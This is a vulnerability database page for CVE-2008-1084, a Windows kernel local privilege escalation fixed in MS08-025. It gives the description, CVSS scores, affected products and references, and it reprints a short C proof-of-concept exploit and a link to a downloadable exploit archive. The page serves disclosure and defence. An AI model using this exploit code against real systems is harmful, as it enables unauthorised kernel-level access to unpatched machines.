CVE-2008-1084 : Detail

CVE-2008-1084

Code Injection
A03-Injection
16.96%V4
Local
2008-04-08
21h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 31585

Publication date : 2008-04-07 22h00 +00:00
Author : Whitecell
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/28554/info Microsoft Windows is prone to a local privilege-escalation vulnerability. The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system. */ #include #include int main(int argc,char *argv[]) { DWORD dwHookAddress = 0x80000000; printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" ); printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress ); return 0; }
Exploit Database EDB-ID : 5518

Publication date : 2008-04-27 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes

// ms08-25-exploit #1 // This exploit takes advantage of one of the vulnerabilities // patched in the Microsoft Security bulletin MS08-25 // http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx // --------------------------------------- // Modifications are strictly prohibited. // For research purposes ONLY. // --------------------------------------- // Ruben Santamarta // www.reversemode.com https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) # milw0rm.com [2008-04-28]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

References

http://www.us-cert.gov/cas/techalerts/TA08-099A.html
Tags : third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=120845064910729&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/28554
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=120845064910729&w=2
Tags : vendor-advisory, x_refsource_HP
https://www.exploit-db.com/exploits/5518
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/29720
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019803
Tags : vdb-entry, x_refsource_SECTRACK